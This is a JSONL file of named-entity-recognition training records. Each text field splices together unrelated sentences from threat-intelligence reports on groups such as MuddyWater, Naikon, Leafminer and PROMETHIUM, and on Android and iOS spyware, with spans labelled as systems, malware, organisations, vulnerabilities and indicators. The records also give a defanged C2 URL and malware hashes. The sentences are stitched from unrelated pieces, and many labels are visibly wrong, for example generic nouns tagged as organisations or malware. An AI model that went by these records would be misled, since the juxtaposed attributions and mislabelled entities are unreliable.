{"text": "It is not common to use this program to distribute malware , although there have been past cases where malware authors have done so . If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": [{"start": 141, "end": 162, "label": "System"}, {"start": 189, "end": 197, "label": "System"}, {"start": 242, "end": 267, "label": "Vulnerability"}, {"start": 284, "end": 295, "label": "Organization"}, {"start": 329, "end": 348, "label": "Malware"}]}
{"text": "Each of the phishing sites contained links to a distribution manifest , which contained metadata such as the application name , version , icon , and a URL for the IPA file . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": [{"start": 174, "end": 183, "label": "Organization"}, {"start": 298, "end": 317, "label": "Vulnerability"}, {"start": 331, "end": 340, "label": "Organization"}, {"start": 357, "end": 368, "label": "Organization"}, {"start": 402, "end": 421, "label": "Malware"}]}
{"text": "To be distributed outside the app store , an IPA package must contain a mobile provisioning profile with an enterprise \u2019 s certificate . The EternalBlue exploit from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 . Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature .", "spans": [{"start": 141, "end": 160, "label": "Vulnerability"}, {"start": 274, "end": 279, "label": "System"}, {"start": 282, "end": 290, "label": "System"}, {"start": 352, "end": 370, "label": "Organization"}, {"start": 399, "end": 409, "label": "Organization"}]}
{"text": "All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L . The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers . We recently noticed the group behind MuddyWater that appear to be targeting government bodies , military entities , telcos and educational institutions in Jordan , Turkey , Azerbaijan and Pakistan , in addition to the continuous targeting of Iraq and Saudi Arabia , other victims were also detected in Mali , Austria , Russia , Iran and Bahrain. .", "spans": [{"start": 105, "end": 121, "label": "Organization"}, {"start": 126, "end": 135, "label": "Organization"}, {"start": 136, "end": 145, "label": "Organization"}, {"start": 150, "end": 161, "label": "Vulnerability"}, {"start": 285, "end": 295, "label": "Organization"}, {"start": 324, "end": 341, "label": "Organization"}, {"start": 344, "end": 361, "label": "Organization"}, {"start": 375, "end": 399, "label": "Organization"}]}
{"text": "Certificate Used The apps themselves pretended to be carrier assistance apps which instructed the user to \u201c keep the app installed on your device and stay under Wi-Fi coverage to be contacted by one of our operators \u201d . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address . Observed Seedworm victims were located primarily in Pakistan and Turkey , but also in Russia , Saudi Arabia , Afghanistan , Jordan , and elsewhere .", "spans": [{"start": 220, "end": 228, "label": "Organization"}, {"start": 255, "end": 264, "label": "Organization"}, {"start": 281, "end": 305, "label": "Vulnerability"}, {"start": 308, "end": 321, "label": "Vulnerability"}, {"start": 374, "end": 382, "label": "Organization"}]}
{"text": "One of the packages after initial launch The iOS variant is not as sophisticated as the Android version , and contained a subset of the functionality the Android releases offered . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign . The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering , in addition to the active development of attacks , infrastructure and the use of new methods and techniques .", "spans": [{"start": 45, "end": 48, "label": "System"}, {"start": 88, "end": 95, "label": "System"}, {"start": 154, "end": 161, "label": "System"}, {"start": 207, "end": 220, "label": "Vulnerability"}, {"start": 300, "end": 317, "label": "Organization"}]}
{"text": "In particular , these packages have not been observed to contain or to download exploits which would be required to perform certain types of activities on iOS devices . Some of the documents exploited CVE-2017-0199 to deliver the payload . Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \" BlackWater \" is associated with suspected persistent threat actor MuddyWater .", "spans": [{"start": 155, "end": 158, "label": "System"}, {"start": 181, "end": 190, "label": "Malware"}, {"start": 201, "end": 214, "label": "Vulnerability"}, {"start": 218, "end": 237, "label": "Malware"}, {"start": 240, "end": 251, "label": "Organization"}, {"start": 387, "end": 410, "label": "Organization"}]}
{"text": "Even without capabilities to exploit a device , the packages were able to exfiltrate the following types of data using documented APIs : Contacts Audio recordings Photos Videos GPS location Device information In addition , the packages offered a feature to perform remote audio recording . The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years . In this latest activity , BlackWater first added an obfuscated Visual Basic for Applications ( VBA ) script to establish persistence as a registry key .", "spans": [{"start": 177, "end": 180, "label": "System"}, {"start": 294, "end": 299, "label": "Organization"}, {"start": 349, "end": 362, "label": "Vulnerability"}, {"start": 461, "end": 490, "label": "System"}, {"start": 493, "end": 496, "label": "System"}]}
{"text": "Though different versions of the app vary in structure , malicious code was initialized at application launch without the user \u2019 s knowledge , and a number of timers were setup to gather and upload data periodically . Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater .", "spans": [{"start": 232, "end": 251, "label": "Organization"}, {"start": 278, "end": 297, "label": "Vulnerability"}, {"start": 356, "end": 361, "label": "Organization"}, {"start": 467, "end": 490, "label": "Organization"}]}
{"text": "Upload data was queued and transmitted via HTTP PUT requests to an endpoint on the C2 . The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit . MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East .", "spans": [{"start": 43, "end": 47, "label": "Indicator"}, {"start": 92, "end": 97, "label": "Organization"}, {"start": 129, "end": 141, "label": "Vulnerability"}, {"start": 144, "end": 171, "label": "Vulnerability"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 203, "end": 216, "label": "Vulnerability"}, {"start": 263, "end": 276, "label": "System"}, {"start": 285, "end": 295, "label": "Organization"}]}
{"text": "The iOS apps leverage the same C2 infrastructure as the Android version and use similar communications protocols . While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well . Between February and March 2019 , probable MuddyWater-associated samples indicated that BlackWater established persistence on the compromised host , at used PowerShell commands to enumerate the victim 's machine and contained the IP address of the actor 's command and control ( C2 ) .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 56, "end": 63, "label": "System"}, {"start": 137, "end": 142, "label": "Organization"}, {"start": 182, "end": 195, "label": "Vulnerability"}, {"start": 219, "end": 232, "label": "Organization"}, {"start": 340, "end": 369, "label": "Malware"}, {"start": 454, "end": 473, "label": "Malware"}, {"start": 527, "end": 529, "label": "Indicator"}, {"start": 545, "end": 550, "label": "Organization"}, {"start": 576, "end": 578, "label": "System"}]}
{"text": "Push notifications were also used to control audio recording . To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability . Despite last month 's report on aspects of the MuddyWater campaign , the group is undeterred and continues to perform operations .", "spans": [{"start": 302, "end": 316, "label": "Vulnerability"}]}
{"text": "Lookout has shared information about this family with Apple , and they have revoked the affected certificates . The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign . Based on these observations , as well as MuddyWater 's history of targeting Turkey-based entities , we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 54, "end": 59, "label": "Organization"}, {"start": 116, "end": 122, "label": "Organization"}, {"start": 144, "end": 157, "label": "Vulnerability"}, {"start": 256, "end": 264, "label": "System"}, {"start": 367, "end": 377, "label": "Organization"}, {"start": 503, "end": 513, "label": "Organization"}]}
{"text": "As a result , no new instances of this app can be installed on iOS devices and existing installations can no longer be run . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . Our recent report , \" The Chronicles of the Hellsing APT : the Empire Strikes Back \" began with an introduction to the Naikon APT , describing it as \" One of the most active APTs in Asia , especially around the South China Sea \" .", "spans": [{"start": 63, "end": 66, "label": "System"}, {"start": 146, "end": 170, "label": "Malware"}, {"start": 199, "end": 263, "label": "Vulnerability"}, {"start": 275, "end": 288, "label": "Vulnerability"}, {"start": 335, "end": 347, "label": "Organization"}, {"start": 354, "end": 373, "label": "Malware"}, {"start": 410, "end": 420, "label": "Organization"}]}
{"text": "Lookout customers are also protected from this threat on both Android and iOS . Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 62, "end": 69, "label": "System"}, {"start": 74, "end": 77, "label": "System"}, {"start": 80, "end": 93, "label": "Organization"}, {"start": 115, "end": 128, "label": "Vulnerability"}, {"start": 199, "end": 212, "label": "Malware"}, {"start": 215, "end": 228, "label": "Vulnerability"}, {"start": 229, "end": 236, "label": "Vulnerability"}]}
{"text": "Android Trojan Found in Targeted Attack 26 MAR 2013 In the past , we \u2019 ve seen targeted attacks against Tibetan and Uyghur activists on Windows and Mac OS X platforms . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 . Considering the volume of Naikon activity observed and its relentless , repeated attack attempts , such a confrontation was worth looking into , so we did .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 136, "end": 143, "label": "System"}, {"start": 148, "end": 156, "label": "System"}, {"start": 169, "end": 182, "label": "Organization"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 255, "end": 270, "label": "System"}]}
{"text": "We \u2019 ve documented several interesting attacks ( A Gift for Dalai Lamas Birthday and Cyber Attacks Against Uyghur Mac OS X Users Intensify ) which used ZIP files as well as DOC , XLS and PDF documents rigged with exploits . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal , Thailand , Laos and China .", "spans": [{"start": 114, "end": 122, "label": "System"}, {"start": 224, "end": 232, "label": "System"}, {"start": 265, "end": 273, "label": "Malware"}, {"start": 289, "end": 302, "label": "Vulnerability"}, {"start": 309, "end": 318, "label": "Organization"}, {"start": 381, "end": 400, "label": "Organization"}, {"start": 405, "end": 437, "label": "Organization"}]}
{"text": "Several days ago , the e-mail account of a high-profile Tibetan activist was hacked and used to send targeted attacks to other activists and human rights advocates . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia .", "spans": [{"start": 185, "end": 190, "label": "Organization"}, {"start": 205, "end": 235, "label": "Vulnerability"}, {"start": 236, "end": 250, "label": "Vulnerability"}, {"start": 261, "end": 269, "label": "System"}, {"start": 274, "end": 285, "label": "System"}, {"start": 309, "end": 318, "label": "Organization"}, {"start": 340, "end": 351, "label": "Organization"}, {"start": 401, "end": 420, "label": "Malware"}, {"start": 444, "end": 450, "label": "Organization"}, {"start": 546, "end": 562, "label": "Organization"}]}
{"text": "Perhaps the most interesting part is that the attack e-mails had an APK attachment \u2013 a malicious program for Android . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . This Naikon report will be complemented by a follow-on report that will examine the Naikon TTP and the incredible volume of attack activity around the South China Sea that has been going on since at least 2010 .", "spans": [{"start": 109, "end": 116, "label": "System"}, {"start": 119, "end": 123, "label": "System"}, {"start": 197, "end": 212, "label": "Organization"}, {"start": 215, "end": 234, "label": "Organization"}, {"start": 237, "end": 256, "label": "Organization"}, {"start": 327, "end": 336, "label": "Organization"}, {"start": 344, "end": 366, "label": "Vulnerability"}, {"start": 385, "end": 389, "label": "System"}, {"start": 405, "end": 411, "label": "Organization"}, {"start": 484, "end": 490, "label": "Organization"}]}
{"text": "The attack On March 24th , 2013 , the e-mail account of a high-profile Tibetan activist was hacked and used to send spear phishing e-mails to their contact list . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others . The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal .", "spans": [{"start": 179, "end": 183, "label": "System"}, {"start": 205, "end": 221, "label": "Vulnerability"}, {"start": 382, "end": 391, "label": "Organization"}, {"start": 454, "end": 473, "label": "Organization"}, {"start": 478, "end": 510, "label": "Organization"}]}
{"text": "This is what the spear phishing e-mail looked like : In regards to the message text above , multiple activist groups have recently organized a human rights conference event in Geneva . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": [{"start": 212, "end": 225, "label": "System"}, {"start": 228, "end": 241, "label": "Vulnerability"}, {"start": 347, "end": 360, "label": "Indicator"}, {"start": 410, "end": 414, "label": "System"}, {"start": 444, "end": 457, "label": "Vulnerability"}, {"start": 458, "end": 465, "label": "Vulnerability"}]}
{"text": "We \u2019 ve noticed an increase in the number of attacks using this event as a lure . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . In the Naikon scheme , a C&C server can be specialized XSControl software running on the host machine .", "spans": [{"start": 87, "end": 100, "label": "Malware"}, {"start": 150, "end": 163, "label": "Malware"}, {"start": 184, "end": 197, "label": "Vulnerability"}, {"start": 362, "end": 368, "label": "Organization"}, {"start": 380, "end": 390, "label": "Malware"}]}
{"text": "Here \u2019 s another example of such an attack hitting Windows users : Going back to the Android Package ( APK ) file was attached to the e-mail , this is pushing an Android application named \u201c WUC \u2019 s Conference.apk \u201d . PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched . It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data Exfiltration from high-profile victim organizations .", "spans": [{"start": 51, "end": 58, "label": "System"}, {"start": 85, "end": 100, "label": "System"}, {"start": 190, "end": 212, "label": "Malware"}, {"start": 217, "end": 227, "label": "Organization"}, {"start": 232, "end": 241, "label": "Organization"}, {"start": 267, "end": 280, "label": "Vulnerability"}, {"start": 431, "end": 440, "label": "Organization"}, {"start": 448, "end": 462, "label": "Malware"}]}
{"text": "This malicious APK is 334326 bytes file , MD5 : 0b8806b38b52bebfe39ff585639e2ea2 and is detected by Kaspersky Lab products as \u201c Backdoor.AndroidOS.Chuli.a \u201d . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload . In addition to stealing keystrokes , Naikon also intercepted network traffic .", "spans": [{"start": 48, "end": 80, "label": "Indicator"}, {"start": 100, "end": 113, "label": "Organization"}, {"start": 128, "end": 154, "label": "Indicator"}, {"start": 159, "end": 169, "label": "Organization"}, {"start": 174, "end": 183, "label": "Organization"}, {"start": 196, "end": 212, "label": "Vulnerability"}, {"start": 303, "end": 309, "label": "Organization"}]}
{"text": "After the installation , an application named \u201c Conference \u201d appears on the desktop : If the victim launches this app , he will see text which \u201c enlightens \u201d the information about the upcoming event : The full text reads follows . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence . Operator X also took advantage of cultural idiosyncrasies in its target countries , for example , the regular and widely accepted use of personal Gmail accounts for work .", "spans": [{"start": 231, "end": 240, "label": "Organization"}, {"start": 266, "end": 279, "label": "Vulnerability"}, {"start": 298, "end": 308, "label": "Organization"}]}
{"text": "Notice notice the use of the mistaken \u201c Word \u201d instead of \u201c World \u201d : \u201c On behalf of all at the Word Uyghur Congress ( WUC ) , the Unrepresented Nations and Peoples Organization ( UNPO ) and the Society for Threatened Peoples ( STP ) , Human Rights in China : Implications for East Turkestan , Tibet and Southern Mongolia In what was an unprecedented coming-together of leading Uyghur , Mongolian , Tibetan and Chinese activists , as well as other leading international experts , we were greatly humbled In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown . In the spring of 2014 , we noticed an increase in the volume of attack activity by the Naikon APT .", "spans": [{"start": 96, "end": 124, "label": "Organization"}, {"start": 131, "end": 186, "label": "Organization"}, {"start": 195, "end": 233, "label": "Organization"}, {"start": 543, "end": 558, "label": "Organization"}, {"start": 561, "end": 571, "label": "Organization"}, {"start": 576, "end": 585, "label": "Organization"}, {"start": 644, "end": 659, "label": "Vulnerability"}, {"start": 794, "end": 804, "label": "Organization"}]}
{"text": "by the great enthusiasm , contribution and desire from all in attendance to make this occasion something meaningful , the outcome of which produced some concrete , action-orientated solutions to our shared grievances . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . In particular , we noticed that the Naikon group was spear-phished by an actor we now call \" Hellsing \" .", "spans": [{"start": 238, "end": 250, "label": "Organization"}, {"start": 279, "end": 289, "label": "Organization"}, {"start": 292, "end": 301, "label": "Organization"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 335, "end": 376, "label": "Vulnerability"}, {"start": 379, "end": 392, "label": "Vulnerability"}, {"start": 439, "end": 445, "label": "System"}, {"start": 542, "end": 554, "label": "Organization"}, {"start": 579, "end": 584, "label": "Organization"}, {"start": 599, "end": 607, "label": "Organization"}]}
{"text": "We are especially delighted about the platform and programme of work established in the declaration of the conference , upon which we sincerely hope will be built a strong and resolute working relationship on our shared goals for the future . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . More details about the cloak and dagger games between Naikon and Hellsing can be found in our blogpost : \" The Chronicles of the Hellsing APT : The Empire Strikes Back \" .", "spans": [{"start": 260, "end": 269, "label": "Organization"}, {"start": 295, "end": 311, "label": "Vulnerability"}, {"start": 320, "end": 330, "label": "Organization"}, {"start": 439, "end": 445, "label": "Organization"}, {"start": 450, "end": 458, "label": "Organization"}, {"start": 514, "end": 526, "label": "Organization"}, {"start": 533, "end": 552, "label": "Malware"}]}
{"text": "With this in mind , we thoroughly look forward to working with you on these matters . Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . Truvasys has been involved in several attack campaigns , where it has masqueraded as one of server common computer utilities , including WinUtils , TrueCrypt , WinRAR , or SanDisk .", "spans": [{"start": 109, "end": 118, "label": "Organization"}, {"start": 138, "end": 152, "label": "Vulnerability"}, {"start": 173, "end": 180, "label": "Organization"}, {"start": 193, "end": 201, "label": "Organization"}, {"start": 227, "end": 257, "label": "Vulnerability"}, {"start": 270, "end": 293, "label": "Organization"}, {"start": 315, "end": 323, "label": "Malware"}, {"start": 421, "end": 439, "label": "Organization"}, {"start": 452, "end": 460, "label": "Organization"}, {"start": 463, "end": 472, "label": "Organization"}, {"start": 475, "end": 481, "label": "Organization"}, {"start": 487, "end": 494, "label": "Organization"}]}
{"text": "Dolkun lsa Chairman of the Executive Committee Word Uyghur Congress \u201d While the victim reads this fake message , the malware secretly reports the infection to a command-and-control server . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . PROMETHIUM is an activity group that has been active as early as 2012 .", "spans": [{"start": 27, "end": 67, "label": "Organization"}, {"start": 233, "end": 242, "label": "Malware"}, {"start": 258, "end": 271, "label": "Vulnerability"}, {"start": 274, "end": 284, "label": "Organization"}]}
{"text": "After that , it begins to harvest information stored on the device . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER . The group primarily uses Truvasys , a first-stage malware that has been in circulation for several years .", "spans": [{"start": 95, "end": 100, "label": "Organization"}, {"start": 122, "end": 152, "label": "Vulnerability"}, {"start": 153, "end": 167, "label": "Vulnerability"}, {"start": 178, "end": 186, "label": "System"}, {"start": 191, "end": 202, "label": "System"}, {"start": 230, "end": 238, "label": "Malware"}]}
{"text": "The stolen data includes : Contacts ( stored both on the phone and the SIM card ) . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East . NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird .", "spans": [{"start": 113, "end": 118, "label": "Organization"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 227, "end": 241, "label": "Vulnerability"}, {"start": 289, "end": 298, "label": "Organization"}, {"start": 372, "end": 381, "label": "Organization"}, {"start": 385, "end": 393, "label": "Malware"}]}
{"text": "Call logs . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 51, "end": 81, "label": "Vulnerability"}, {"start": 82, "end": 96, "label": "Vulnerability"}, {"start": 107, "end": 115, "label": "System"}, {"start": 120, "end": 131, "label": "System"}, {"start": 155, "end": 164, "label": "Organization"}, {"start": 182, "end": 192, "label": "Organization"}, {"start": 197, "end": 206, "label": "Organization"}, {"start": 220, "end": 227, "label": "Vulnerability"}, {"start": 232, "end": 245, "label": "Vulnerability"}, {"start": 273, "end": 278, "label": "System"}]}
{"text": "SMS messages . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks .", "spans": [{"start": 15, "end": 23, "label": "System"}, {"start": 46, "end": 59, "label": "System"}, {"start": 80, "end": 93, "label": "Vulnerability"}]}
{"text": "Geo-location . Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows . In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": [{"start": 102, "end": 159, "label": "Vulnerability"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 260, "end": 270, "label": "Organization"}, {"start": 275, "end": 284, "label": "Organization"}, {"start": 329, "end": 349, "label": "Organization"}]}
{"text": "Phone data ( phone number , OS version , phone model , SDK version ) . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Meanwhile , NEODYMIUM used well-tailored spear-phishing emails with attachments that delivered the exploit code , ultimately leading to Wingbird 's installation on victim computers .", "spans": [{"start": 151, "end": 176, "label": "Malware"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 237, "end": 249, "label": "System"}, {"start": 281, "end": 307, "label": "System"}, {"start": 310, "end": 313, "label": "System"}, {"start": 330, "end": 339, "label": "Organization"}, {"start": 374, "end": 380, "label": "System"}, {"start": 417, "end": 424, "label": "Vulnerability"}, {"start": 454, "end": 462, "label": "Malware"}]}
{"text": "It is important to note that the data won \u2019 t be uploaded to C & C server automatically . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload .", "spans": [{"start": 174, "end": 199, "label": "Malware"}, {"start": 232, "end": 245, "label": "Vulnerability"}, {"start": 260, "end": 272, "label": "System"}, {"start": 304, "end": 330, "label": "System"}, {"start": 333, "end": 336, "label": "System"}, {"start": 341, "end": 351, "label": "Organization"}, {"start": 356, "end": 365, "label": "Organization"}, {"start": 378, "end": 386, "label": "Vulnerability"}, {"start": 387, "end": 394, "label": "Vulnerability"}]}
{"text": "The Trojan waits for incoming SMS messages ( the \u201c alarmReceiver.class \u201d ) and checks whether these messages contain one of the following commands : \u201c sms \u201d , \u201c contact \u201d , \u201c location \u201d , \u201c other \u201d . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Wingbird , the advanced malware used by NEODYMIUM , has several behaviors that trigger alerts in Windows Defender ATP .", "spans": [{"start": 51, "end": 70, "label": "Indicator"}, {"start": 286, "end": 299, "label": "Malware"}, {"start": 319, "end": 358, "label": "Vulnerability"}, {"start": 361, "end": 374, "label": "Vulnerability"}, {"start": 377, "end": 385, "label": "Malware"}, {"start": 417, "end": 426, "label": "Organization"}, {"start": 474, "end": 494, "label": "Organization"}]}
{"text": "If one these commands is found , then the malware will encode the stolen data with Base64 and upload it to the command and control server . TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication . This volume chronicles two activity groups , code-named PROMETHIUM and NEODYMIUM , both of which target individuals in a specific LOC of Europe .", "spans": [{"start": 140, "end": 147, "label": "Organization"}, {"start": 196, "end": 199, "label": "Organization"}, {"start": 254, "end": 271, "label": "Vulnerability"}, {"start": 324, "end": 339, "label": "Organization"}, {"start": 353, "end": 363, "label": "Organization"}, {"start": 368, "end": 377, "label": "Organization"}]}
{"text": "The C2 URL is : hxxp : //64.78.161.133/ * victims \u2019 s_cell_phone_number * /process.php In addition to this , the malware also reports to another script , \u201c hxxp : //64.78.161.33/android.php \u201d . TG-3390 actors have used Java exploits in their SWCs . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": [{"start": 16, "end": 86, "label": "Indicator"}, {"start": 156, "end": 189, "label": "Indicator"}, {"start": 194, "end": 201, "label": "Organization"}, {"start": 219, "end": 232, "label": "Vulnerability"}, {"start": 242, "end": 246, "label": "System"}, {"start": 330, "end": 338, "label": "Organization"}, {"start": 365, "end": 380, "label": "Organization"}, {"start": 414, "end": 434, "label": "Organization"}]}
{"text": "First , it will get the \u201c nativenumber \u201d variable from the \u201c telmark \u201d value of \u201c AndroidManifest.xml \u201d . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . In May 2016 , both PROMETHIUM and NEODYMIUM were observed to launch attack campaigns .", "spans": [{"start": 82, "end": 101, "label": "System"}, {"start": 122, "end": 129, "label": "Organization"}, {"start": 144, "end": 157, "label": "Vulnerability"}, {"start": 225, "end": 245, "label": "System"}, {"start": 252, "end": 265, "label": "Vulnerability"}, {"start": 287, "end": 292, "label": "System"}, {"start": 427, "end": 437, "label": "Organization"}, {"start": 442, "end": 451, "label": "Organization"}]}
{"text": "This is hardcoded and equals \u201c phone \u201d . In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . NEODYMIUM is an activity group that , like PROMETHIUM , conducted an attack campaign in early May 2016 .", "spans": [{"start": 90, "end": 103, "label": "Vulnerability"}, {"start": 171, "end": 191, "label": "System"}, {"start": 198, "end": 211, "label": "Vulnerability"}, {"start": 233, "end": 238, "label": "System"}, {"start": 354, "end": 363, "label": "Organization"}, {"start": 397, "end": 407, "label": "Organization"}]}
{"text": "Then , it will add the result of the public method localDate.getTime ( ) , which simply gets the current date . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems . Data about Wingbird activity indicates that it is typically used to attack individuals and individual computers instead of networks .", "spans": []}
{"text": "An example of the string which is sent to the command-and-control would be \u201c phone 26.03.2013 \u201d . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can\u2032t prove they were related to this particular attack . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence .", "spans": [{"start": 163, "end": 177, "label": "Vulnerability"}, {"start": 180, "end": 212, "label": "System"}, {"start": 339, "end": 348, "label": "Organization"}, {"start": 374, "end": 387, "label": "Vulnerability"}, {"start": 388, "end": 395, "label": "Vulnerability"}, {"start": 406, "end": 416, "label": "Organization"}]}
